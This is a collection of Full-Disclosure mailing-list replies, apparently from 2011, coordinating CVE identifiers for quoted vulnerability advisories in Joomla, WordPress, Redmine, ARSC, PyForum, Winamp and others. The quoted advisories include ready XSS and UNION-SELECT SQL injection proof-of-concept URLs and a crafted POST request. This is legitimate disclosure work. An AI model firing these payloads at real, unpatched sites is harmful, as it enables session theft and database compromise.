> website: http://bkis.vn

Identifier CVE-2011-2706 is assigned for this issue. Please edit advisory 
accordingly.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Phone Scam

[Henri Salo]

On Wed, Jul 20, 2011 at 02:19:37PM +0100, Dave wrote:
> A stranger on the end of a phone call tells you your PC is infected, and you 
> should download and install a RC server so it can be fixed.

I haven't seen anything like this in Finland. I'll bet they will start soon..

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fwd: Joomla! Security News

[Henri Salo]

Joomla! Developer Network - Security News

///
[20110701] - XSS Vulnerability

Posted: 19 Jul 2011 09:15 PM PDT
http://feedproxy.google.com/~r/JoomlaSecurityNews/~3/4KDvSjZRIvs/357-20110701-xss-vulnerability.html?utm_source=feedburner&utm_medium=email


Project: Joomla!
SubProject: All
Severity: Medium
Versions: 1.6.5 and all earlier 1.6.x versions
Exploit type: XSS
Reported Date: 2011-July-11
Fixed Date: 2011-July-19

Description

Inadequate escaping leads to XSS vulnerability.

Affected Installs

Joomla! version 1.6.5 and all earlier 1.6.x versions
Solution

Upgrade to the latest Joomla! version (1.7.0 or later)

Reported by Aung Khant
Contact

The JSST at the Joomla! Security  Center.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [BMSA-2009-07] Backdoor in PyForum

[Henri Salo]

On Mon, Nov 30, 2009 at 09:06:44PM +0700, Nam Nguyen wrote:
> BLUE MOON SECURITY ADVISORY 2009-07
> ===
> 
> 
> :Title: Backdoor in PyForum
> :Severity: Critical
> :Reporter: Blue Moon Consulting
> :Products: PyForum v1.0.3
> :Fixed in: --
> 
> 
> Description
> ---
> 
> pyForum is a 100% python-based message board system based in the excellent 
> web2py framework.
> 
> We have discovered a backdoor in PyForum. Anyone could force a password reset 
> on behalf of other users whose emails are known. More importantly, the 
> software author, specifically, can obtain the new Administrator's password 
> remotely.
> 
> The problem is in module ``forumhelper.py``. A new password is generated and 
> saved in the database. Then a notification email which contains this new 
> password in plaintext is sent to the user. There is no password reset 
> confirmation code or similar verification action required. This causes a mild 
> annoyance, or at most an account lockout.
> 
> When it comes to Administrator account, however, the problem is more severe. 
> This default account's email is set to ``administra...@pyforum.org`` and can 
> only be changed directly in the database. Therefore, new password is sent to 
> the software author by default. And since this email address is known, 
> everyone can request a password reset easily.
> 
> This bug may exist in older versions and in zForum, from which pyForum 
> derives, too.
> 
> Workaround
> --
> 
> Change Administrator's email address immediately and do not publish it 
> anywhere.
> 
> Fix
> ---
> 
> There is no fix at the moment.
> 
> Disclosure
> --
> 
> Blue Moon Consulting adapts `RFPolicy v2.0 
> <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.
> 
> Considered this *an intentional backdoor*, we decided to alert the public 
> immediately.
> 
> :Initial vendor contact:
> 
>   --
> 
> :Vendor response:
> 
>   --
> 
> :Further communication:
> 
>   --
> 
> :Public disclosure: November 30, 2009
> 
> :Exploit code:
> 
>   No exploit code required.
> 
> Disclaimer
> --
> 
> The information provided in this advisory is provided "as is" without 
> warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, 
> either express or implied, including the warranties of merchantability and 
> fitness for a particular purpose. Your use of the information on the advisory 
> or materials linked from the advisory is at your own risk. Blue Moon 
> Consulting Co., Ltd reserves the right to change or update this notice at any 
> time.

This still hasn't been fixed. I asked status in 
http://www.pyforum.org/pyforum/default/view_topic/631

If I am correct also vulnerabilities in 
http://seclists.org/bugtraq/2009/Dec/224 are not fixed.

Is there a CVE-identifier for BMSA-2009-07?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Possible Code Execution vulnerability in WordPress ?

[Henri Salo]

On Sun, Jul 03, 2011 at 01:46:30PM +0200, Marc Manthey wrote:
> hello list,
> 
> Sorry this is my first post to this list because i am really worried  
> about a  wordpress vulnerability and someone on this list might use  
> wordpress aswell
> and could give me some advice what todo.
> 
> I am using wordpress since 2 years without any trouble, update  
> regulary , but last friday, i got a mail from my hoster that someone  
> "uploaded"
> a phishing script into my "upload folder" in wordpress and google put  
> my site on the blocklists aswell.
> 
>   After i found out that the "contact form" module might cause the  
> problem because i allways found a
>   "wpcf7_captcha" directory in my "upload folder , i removed the  
> module and all when fine for a day..
> 
> >> http://let.de/wp-content/themes/twentyten/www1.royalbank.com/index.html
> 
> Today i received another mail from rsa.com  that the same script is  
> still on my site just in a "theme" folder.
> 
> > http://let.de/wp-content/uploads/2011/www1.royalbank.com/index.html
> 
> 
> I  looked into the installed "phishing script"   
> http://www.2shared.com/file/M9zwMVr5/www1royalbankcom.html
> it seems everything is loaded from https://www1.royalbank.com/  for  
> example
> https://www1.royalbank.com/common/images/english/logo_rbc_rb.gif  <  
> but this is not the original banking site !!
> 
> Is this a DNS manipulation ? https://www1.royalbank.com <  ??? when i  
> try http://www.royalbank.com it redirects me to the original banking  
> site at
> 
> http://www.rbcroyalbank.com  
> 
> After  i searched for some information , i found this on the full  
> disclosure list , and i am a bit  concerned now
> 
> [Full-disclosure] Code Execution vulnerability in WordPress  
> http://seclists.org/fulldisclosure/2011/Apr/535
> 
> 
> Vulnerabilities in WordPress http://www.securityfocus.com/archive/1/510274
> 
> any idea what todo beside shutting my site down :)?
> 
> regards
> 
> Marc
> 
> >>  Original Message 
> >> Subject:   Fraudulent site, please shut down! [RBC 11266] IP:
> >> 91.184.33.25 Domain: let.de
> >> Date:  Sun, 3 Jul 2011 02:33:05 +0300
> >> From:  
> >> To:
> >> CC:
> >>
> 
> 
> 
> --  Les enfants teribbles - research / deployment
> Marc Manthey- Vogelsangerstrasse 97
> 50823 Köln - Germany
> Tel.:0049-221-29891489
> Mobil:0049-1577-3329231
> blog: http://let.de
> twitter: http://twitter.com/macbroadcast/
> facebook : http://opencu.tk

Which version of Wordpress and modules you were using? Do you have logs of the 
incident? I am including RBC to this email as they probably are interested of 
the details. There might be other similar phishing pages active.

www1.royalbank.com has address 142.245.40.233
www.royalbank.com has address 142.245.34.203
royalbank.com has address 142.245.1.203
www.rbcroyalbank.com has address 142.245.1.15
rbcroyalbank.com has address 142.245.1.15

Whois of both domains:
---
   Registrant: 
  Royal Bank of Canada
  RBC Domain Registration
  330 Front St W - 4th Flr 
  Toronto, ON M5V 3B7
  CA
  Email: rbcdomain...@rbc.com

   Registrar Name: CORPORATE DOMAINS, INC.
   Registrar Whois...: whois.corporatedomains.com
   Registrar Homepage: www.cscprotectsbrands.com 

   Domain Name: rbcroyalbank.com

  Created on..: Thu, Nov 09, 2000
  Expires on..: Sun, Nov 09, 2014
  Record last updated on..: Fri, Feb 11, 2011

   Administrative,Technical Contact:
  Royal Bank of Canada
  RBC Domain Registration
  330 Front St W - 4th Flr 
  Toronto, ON M5V 3B7
      CA
  Phone: +1.4163485121
  Email: rbcdomain...@rbc.com

   DNS Servers:

   ns4.rbc.com
   ns2.rbc.com
   ns1.rbc.com
   ns3.rbc.com
---

Reading this bug-raport http://core.trac.wordpress.org/ticket/17969 says to me 
that there is still possibility of vulnerability. I'll bet it is in one of the 
modules as well.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SEC Consult SA-20110701-0 :: Multiple SQL injection vulnerabilities in WordPress

[Henri Salo]

On Fri, Jul 01, 2011 at 11:23:40AM +0200, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >
> ===
>   title: Multiple SQL Injection Vulnerabilities
> product: WordPress
>  vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
>   fixed version: 3.1.4/3.2-RC3
>  impact: Medium
>homepage: http://wordpress.org/
>   found: 2011-06-21
>  by: K. Gudinavicius   
>  SEC Consult Vulnerability Lab 
>  https://www.sec-consult.com
> ===
> 
> Vendor description:
> ---
> "WordPress was born out of a desire for an elegant, well-architectured
> personal publishing system built on PHP and MySQL and licensed under
> the GPLv2 (or later). It is the official successor of b2/cafelog.
> WordPress is fresh software, but its roots and development go back to
> 2001."
> 
> Source: http://wordpress.org/about/
> 
> 
> 
> Vulnerability overview/description:
> ---
> Due to insufficient input validation in certain functions of WordPress
> it is possible for a user with the "Editor" role to inject arbitrary
> SQL commands. By exploiting this vulnerability, an attacker gains
> access to all records stored in the database with the privileges of the
> WordPress database user.
> 
> 
> 
> Proof of concept:
> -
> 1) The get_terms() filter declared in the wp-includes/taxonomy.php file
> does not properly validate user input,  allowing an attacker with
> "Editor" privileges to inject arbitrary SQL commands in the "orderby"
> and "order" parameters passed as array members to the vulnerable filter
> when sorting for example link categories. 
> 
> The following URLs could be used to perform blind SQL injection
> attacks: 
> 
> http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
> injection]&order=[SQL injection]
> http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
> injection]&order=[SQL injection]
> http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
> injection]&order=[SQL injection]
> 
> 
> 2) The get_bookmarks() function declared in the
> wp-includes/bookmark.php file does not properly validate user input,
> allowing an attacker with "Editor" privileges to inject arbitrary SQL
> commands in the "orderby" and "order" parameters passed as array
> members to the vulnerable function when sorting links. 
> 
> The following URL could be used to perform blind SQL injection attacks:
> 
> http://localhost/wp-admin/link-manager.php?orderby=[SQL
> injection]&order=[SQL injection]
> 
> 
> Vulnerable / tested versions:
> -
> The vulnerability has been verified to exist in version 3.1.3 of
> WordPress, which is the most recent version at the time of discovery.
> 
> 
> Vendor contact timeline:
> 
> 2011-06-22: Contacting vendor through secur...@wordpress.org
> 2011-06-22: Vendor reply, sending advisory draft
> 2011-06-23: Vendor confirms security issue
> 2011-06-30: Vendor releases patched version
> 2011-07-01: SEC Consult publishes advisory
> 
> 
> 
> Solution:
> -
> Upgrade to version 3.1.4 or 3.2-RC3
> 
> 
> Workaround:
> ---
> A more restrictive role, e.g. "Author", could be applied to the user.
> 
> 
> 
> Advisory URL:
> -
> https://www.sec-consult.com/en/advisories.html
> 
> 
> ~~~
> SEC Consult Unternehmensberatung GmbH
> 
> Office Vienna
> Mooslackengasse 17
> A-1190 Vienna
> Austria
> 
> Tel.: +43 / 1 / 890 30 43 - 0
> Fax.: +43 / 1 / 890 30 43 - 25
> Mail: research at sec-consult dot com
> https://www.sec-consult.com
> 
> EOF K. Gudinavicius / @2011

Does Wordpress people know if this issue has CVE-identifier already? At least 
author of the advisory didn't request one nor did I could find one from lists / 
web.

References:
http://secunia.com/advisories/45099/
http://wordpress.org/news/2011/06/wordpress-3-1-4/

This is also not listed in osvdb, which I can handle after we receive 
CVE-identifier.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] in_midi multiple vulnerabilities in Winamp 5.61

[Henri Salo]

1 41 41 41 41 41 41 41 41 41 41 41 41 
> 012462D8 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
> 
> 
> ###
> 
> ===
> 3) The Code
> ===
> 
> 
> http://aluigi.org/poc/winamp_3.zip
> 
> winamp_3a.mid will exploit the arbitrary freeing of address 0x61616161.
> 
> 
> ###
> 
> ==
> 4) Fix
> ==
> 
> 
> No fix.
> 
> 
> ###
> 
> 
> --- 
> Luigi Auriemma
> http://aluigi.org

No CVE-identifier requested by the founder "Luigi Auriemma", but I requested 
one from MITRE. They have not yet responded. I also reported this issue to 
Winamp. No reponse from they either. Does anyone have experience of Winamp's 
security-related communication?

Do you have any idea if this has been fixed in version Winamp Media Player 5.62?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

[Henri Salo]

On Tue, Jun 28, 2011 at 02:25:07PM +0800, YGN Ethical Hacker Group wrote:
> Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
> 
> 
> 
> 1. OVERVIEW
> 
> Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting 
> issues.
> 
> 
> 2. BACKGROUND
> 
> Joomla is a free and open source content management system (CMS) for
> publishing content on the World Wide Web and intranets. It comprises a
> model–view–controller (MVC) Web application framework that can also be
> used independently.
> Joomla is written in PHP, uses object-oriented programming (OOP)
> techniques and software design patterns, stores data in a MySQL
> database, and includes features such as page caching, RSS feeds,
> printable versions of pages, news flashes, blogs, polls, search, and
> support for language internationalization.
> 
> 
> 3. VULNERABILITY DESCRIPTION
> 
> Several parameters (QueryString, option, searchword) in Joomla! Core
> components (com_content, com_contact, com_newsfeeds, com_search) are
> not properly sanitized upon submission to the /index.php url, which
> allows attacker to conduct Cross Site Scripting attack. This may allow
> an attacker to create a specially crafted URL that would execute
> arbitrary script code in a victim's browser.
> 
> 
> 4. VERSION AFFECTED
> 
> 1.6.3 and lower
> 
> 
> 5. PROOF-OF-CONCEPT/EXPLOIT
> 
> 
> component: com_contact , parameter: QueryString (Browser: All)
> ===
> 
> http://attacker.in/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";>alert(/XSS/)
> 
> 
> component:com_content , parameter:  QueryString (Browser: All)
> ===
> 
> http://attacker.in/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=>alert(/XSS/)
> 
> 
> component: com_newsfeeds , parameter: QueryString (Browser: All)
> =
> 
> http://attacker.in/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere=";>alert(/XSS/)&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering
> 
> 
> parameter: option (Browser: All)
> 
> 
> http://attacker.in/joomla163_noseo/index.php?option=";>alert(/XSS/)&task=reset.request
> 
> 
> component: com_search, parameter: searchword (Browser: IE, Konqueror)
> =
> 
> [REQUEST]
> POST /joomla163/index.php HTTP/1.1
> Referer: http://attacker.in/joomla163/
> User-Agent: Konqueror/4.5
> Cache-Control: no-cache
> Content-Type: application/x-www-form-urlencoded
> Host: attacker.in
> Accept-Encoding: gzip, deflate
> Content-Length: 125
> 
> option=com_search&searchword='%2522%253C%252Fscript%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E&task=search
> [/REQUEST]
> 
> This searchword XSS was identified via source code:
> http://yehg.net/lab/pr0js/advisories/joomla/core/1.6.3/xss/XSS%20%5bMode=SEO,NON-SEO%5d/(searchword)_xss_vuln_code_portion.jpg
> 
> 
> 6. IMPACT
> 
> Attackers can compromise currently logged-in user/administrator
> session and impersonate arbitrary user actions available under
> /administrator/ functions.
> 
> 
> 7. SOLUTION
> 
> Upgrade to Joomla! 1.6.4 or higher
> 
> 
> 8. VENDOR
> 
> Joomla! Developer Team
> http://www.joomla.org
> 
> 
> 9. CREDIT
> 
> This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
> Ethical Hacker Group, Myanmar.
> 
> 
> 10. DISCLOSURE TIME-LINE
> 
> 2011-05-26: notified vendor
> 2011-06-28: vendor released fix
> 2011-06-28: vulnerability disclosed
> 
> 
> 11. REFERENCES
> 
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
> Vendor Advisory URL:
> http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html
> XSS FAQ: http://www.cgisecurity.com/xss-faq.html
> OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
> CWE-79: http://cwe.mitre.org/data/definitions/79.html
> 
> 
> #yehg [2011-06-28]

CVE-2011-2509 can be used for this issue. Could Joomla-people update 
http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html 
advisory, thank you?

References:
http://seclists.org/oss-sec/2011/q2/730

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS Vulnerability in Redmine 1.0.1 to 1.1.1

[Henri Salo]

On Wed, Apr 06, 2011 at 01:22:06PM +0300, Netsparker Advisories wrote:
> Information
> 
> Name :  XSS vulnerability in Redmine
> Software :  all Redmine versions from 1.0.1 to 1.1.1
> Vendor Homepage :  http://www.redmine.org
> Vulnerability Type :  Cross-Site Scripting
> Severity :  High
> Researcher :  Mesut Timur 
> Advisory Reference :  NS-11-004
> 
> Description
> --
> Redmine is a flexible project management web application written using
> Ruby on Rails framework.
> 
> Details
> ---
> Redmine is affected by a XSS vulnerability in versions from 1.0.1 to 1.1.1.
> Example PoC url is as follows :
> 
> http://example.com/projects/hg-helloworld/news/%22onload=%22alert%281%29
> 
> 
> You can read the full article about Cross-Site Scripting
> vulnerabilities from here :
> http://www.mavitunasecurity.com/crosssite-scripting-xss/
> 
> Solution
> ---
> Upgrade to the latest Redmine version (1.1.2).
> 
> Credits
> ---
> It has been discovered on testing of Netsparker, Web Application
> Security Scanner - http://www.mavitunasecurity.com/netsparker/.
> 
> References
> ---
> 1. Vendor URL: http://www.redmine.org/news/53
> 2. MSL Advisory Link :
> http://www.mavitunasecurity.com/XSS-vulnerability-in-Redmine/
> 3. Netsparker Advisories :
> http://www.mavitunasecurity.com/netsparker-advisories/
> 
> About Netsparker
> ---
> Netsparker can find and report security issues such as SQL Injection
> and Cross-site Scripting (XSS) in all web applications regardless of
> the platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allows it to be dead accurate in
> reporting hence it's the first and the only False Positive Free web
> application security scanner.
> 
> -- 
> Netsparker Advisories, 
> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

You can use CVE-2011-1723 identifier for this issue. References:

http://osvdb.org/71564

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IL and XSS vulnerabilities in multiple themes for WordPress

[Henri Salo]

On Tue, Jun 07, 2011 at 06:57:44PM +0300, MustLive wrote:
> Hi David!
> 
> You need to look harder ;-). Looks like you checked these two themes on those 
> sites, admins of which deleted this file. There are admins who can understand 
> that scripts with phpinfo must not be at working sites (but it's rare cases, 
> and larger part of the sites with affected themes for WP contain test.php).
> 
> Yes, I've check all these 15 themes (I've tested even more and wasted a lot 
> of time on it, but found exactly at these 15 themes). I've found them at live 
> web sites in Internet, as I mentioned earlier.
> 
> Here are examples of the sites with test.php in Typebased and NewsPress 
> themes:
> 
> http://thenetexperiment.com/wp-content/themes/typebased/includes/test.php
> 
> http://coporan.3x.ro/wp-content/themes/newspress/includes/test.php
> 
> For example, in April I was trying to find test.php in these 15 and other 
> themes at WooThemes' demo site, but they haven't this file in any of their 
> themes (among those tested by me). So as for their own sites, then they 
> understand the risk, and when to sell holes for large price for their 
> clients, then they already don't understand the risk and position it as a 
> feature :-).
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site

Please don't waste your time anymore :)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTB22997: XSS in A Really Simple Chat (ARSC)

[Henri Salo]

On Wed, Jun 01, 2011 at 02:10:31PM +0200, advis...@htbridge.ch wrote:
> Vulnerability ID: HTB22997
> Reference: 
> http://www.htbridge.ch/advisory/xss_in_a_really_simple_chat_arsc.html
> Product: A Really Simple Chat (ARSC)
> Vendor: http://www.reallysimplechat.org/ ( http://www.reallysimplechat.org/ ) 
> Vulnerable Version: 3.3-rc2
> Vendor Notification: 12 May 2011 
> Vulnerability Type: XSS (Cross Site Scripting)
> Risk level: Medium 
> Credit: High-Tech Bridge SA Security Research Lab ( 
> http://www.htbridge.ch/advisory/ ) 
> 
> Vulnerability Details:
> User can execute arbitrary JavaScript code within the vulnerable application.
> The vulnerability exists due to failure in the "dereferer.php" script to 
> properly sanitize user-supplied input in "arsc_link" variable.
> Successful exploitation of this vulnerability could result in a compromise of 
> the application, theft of cookie-based auwhentication credentials, disclosure 
> or modification of sensitive data.
> The following PoC is available:
> 
> http://[host]/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

This can be refered as CVE-2011-2180. Could you please update your www-site 
advisory?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTB22999: Multiple SQL Injections in A Really Simple Chat (ARSC)

[Henri Salo]

On Wed, Jun 01, 2011 at 02:10:13PM +0200, advis...@htbridge.ch wrote:
> Vulnerability ID: HTB22999
> Reference: 
> http://www.htbridge.ch/advisory/multiple_sql_injections_in_a_really_simple_chat_arsc.html
> Product: A Really Simple Chat (ARSC)
> Vendor: http://www.reallysimplechat.org/ ( http://www.reallysimplechat.org/ ) 
> Vulnerable Version: 3.3-rc2
> Vendor Notification: 12 May 2011 
> Vulnerability Type: SQL Injection
> Risk level: High 
> Credit: High-Tech Bridge SA Security Research Lab ( 
> http://www.htbridge.ch/advisory/ ) 
> 
> Vulnerability Details:
> The vulnerability exists due to failure in the "/base/admin/edit_user.php" 
> script to properly sanitize user-supplied input in "user" variable.
> Attacker can alter queries to the application SQL database, execute arbitrary 
> queries to the database, compromise the application, access or modify 
> sensitive data, or exploit various vulnerabilities in the underlying SQL 
> database.
> The following PoC is available:
> 
> http://[host]/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
> 
> The vulnerability exists due to failure in the "/base/admin/edit_layout.php" 
> script to properly sanitize user-supplied input in "arsc_layout_id" variable.
> The following PoC is available:
> 
> http://[host]/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
> 
> The vulnerability exists due to failure in the "/base/admin/edit_room.php" 
> script to properly sanitize user-supplied input in "arsc_room" variable.
> The following PoC is available:
> 
> http://[host]/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202

These issues can be refered as: CVE-2011-2181. Could you please update www-site 
advisory?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] find11.html

[Henri Salo]

On Tue, May 31, 2011 at 01:16:48PM +1000, Daniel Hood wrote:
> Anyone else seen this going around?
> 
> I've got a couple of links coming through for this via hacked email
> accounts. Looks like its installing FakeAV.
> 
> Links include:
> www [dot] epo4 [dot] com [slash] find11.html
> 
> I can't seem to find anything on google about it yet though.
> 
> Dan

Could someone share the sample with me? It seem that for me the domain does not 
resolv.

Resolving safetylife2011.org... failed: Name or service not known.

Bit strange..

foo@bar:~$ host safetylife2011.org
safetylife2011.org has address 84.127.74.15
safetylife2011.org has address 71.37.32.247
safetylife2011.org has address 82.159.38.56
safetylife2011.org has address 85.84.60.87
safetylife2011.org has address 46.223.138.2 (TCP 80 not responding)

Every online host is running nginx 0.8.54 web server.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [webmin-devel] XSS in Webmin 1.540 + exploit for privilege escalation

[Henri Salo]

On Sat, Apr 23, 2011 at 06:11:12PM -0700, Jamie Cameron wrote:
> Hi Javier,
> 
> Thanks for reporting this - I hadn't considered this attack
> vector, as I didn't realize that chfn could be used to modify a user's
> real name.
> 
> I have created a fix which you can see at :
> 
> https://github.com/webmin/webmin/commit/46e3d3ad195dcdc1af1795c96b6e0dc778fb6881
> 
> Also an update for the Users and Groups module can be found at 
> http://www.webmin.com/updates.html , and will be available from within
> the Webmin UI.
> 
>  - Jamie

In what Webmin-release this will be fixed? Do you have CVE-identifier for this 
yet?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SQL Injection in Pixie

[Henri Salo]

Are you going to react to this at all? This isn't even the first time: 
http://www.securityfocus.com/archive/1/517931

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SQL Injection in Pixie

[Henri Salo]

Are you going to react to this at all? This isn't even the first time: 
http://www.securityfocus.com/archive/1/517931

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MalBox Release! A Program Behavior Analysis System!

[Henri Salo]

On Sat, May 14, 2011 at 10:55:30PM +0100, Chris M wrote:
> Not convinced.
> 
> Tried to upload a few samples, "only support EXE files"  no DLLs? yet
> you take URLs? only to exes?
> 
> The file I upped was a PE file. Just with a renamed extension.
> 
> Also submitted a couple of "known bad" files and got a list of tcp ports
> back how is this operating? _SHARED_ sandbox?
> 
> Whats it based on?
> 
> More information would be appreciated :)
> 
> -C

I can still get HTTP 500 errors easily. That service is running vulnerable 
version of Tomcat and still saying wrong TCP-connections with any scan 
url/exe-sample. JS checks aren't done in backend.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MalBox Release! A Program Behavior Analysis System!

[Henri Salo]

On Fri, May 13, 2011 at 11:09:46PM +0800, CnCxzSec衰仔 wrote:
> As many questions has been raised about this online tool, we have contacted
> the authors of this tools. Here is their answer.
> 
> *Hi,
> Malbox  is developed by a couple of students of
> botnet research team in Network Security Lab of  Xi’an Jiaotong
> University(one of the top universities in China). At first it was used  to
> analyze botnet malwares captured by  honeynet, then we decided to release a
> web version, in order to supply a malware analysis service to people who may
> need it, and to collect more  malware samples for research.
> We may do “not good enough”, but we won’t do “bad”.*
> 
> Best regards,
> Shane Zhao

Great service.. or not:

HTTP 500
Apache Tomcat/7.0.11

java.lang.StringIndexOutOfBoundsException: String index out of range: -1
java.lang.String.substring(String.java:1943)
java.lang.String.substring(String.java:1916)
upload.UploadServlet.doGet(UploadServlet.java:133)
upload.UploadServlet.doPost(UploadServlet.java:91)
javax.servlet.http.HttpServlet.service(HttpServlet.java:641)
javax.servlet.http.HttpServlet.service(HttpServlet.java:722)

Best regards,
Henri

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Requesting/Reserving CVE Question

[Henri Salo]

On Thu, Apr 28, 2011 at 09:14:57AM -0600, ctrun...@christophertruncer.com wrote:
> Hello all,
> 
> First off, if this isn't the place to ask this question, I apologize, and
> feel free to ignore this e-mail.  
> 
> I've found a couple vulnerabilities in a web forum/portal/etc. product
> called IP.Board.  I was looking to reserve a CVE number, and I attempted to
> contact the address Mitre lists for reserving one, however, it's been
> nearly a month and I have not received anything back from them.  This is
> the first vulnerability I have found, and have never requested/reserved a
> CVE before, so I am a little unfamiliar with the process (although based
> off of the following website, it looks like all I need to do is send an
> e-mail to them - http://cve.mitre.org/cve/obtain_id.html).  
> 
> I've sent follow up e-mails and I've received no response.  What my
> question to you all is how long does this process take?  Is there something
> else that should be done, or someone else the request should be sent to? 
> What's time normal time frame from requesting a CVE number to hearing back
> from them?
> 
> Thanks for any help/info/advice.  I appreciate it.
> 
> Chris

No luck. With open-source you could have tried:
http://oss-security.openwall.org/wiki/mailing-lists/oss-security

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Multiple vulnerabilities in MyBB

[Henri Salo]

On Fri, Apr 22, 2011 at 07:21:55PM +0300, MustLive wrote:
> Hello list!
> 
> I want to warn you about Information Leakage, Abuse of Functionality,
> Insufficient Anti-automation and Brute Force vulnerabilities in
> MyBB.
 
> Information Leakage (WASC-13):


Ouh this is better than most comedy-movies.

Best regards,
Henri

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New vulnerabilities in eSitesBuilder

[Henri Salo]

On Sat, Apr 16, 2011 at 07:56:18PM -0500, security curmudgeon wrote:
> 
> : SecurityVulns ID: 11310.
> 
> : XSS (WASC-08):
> : 
> : 
> http://site/console/forget.php?e_mail=%3Cscript%3Ealert(document.cookie)%3C/script%3E&seenform=y
> 
> How many times are you going to disclose this?
> 
> http://seclists.org/bugtraq/2010/Jun/189
> 
> http://seclists.org/fulldisclosure/2010/Aug/306
> 
> http://seclists.org/fulldisclosure/2010/Dec/465
> 
> The June disclosure has a timeline indicating you had "announced" it 
> almost two years prior to that:
> 
> 21.11.2007 - found some of these vulnerabilities.
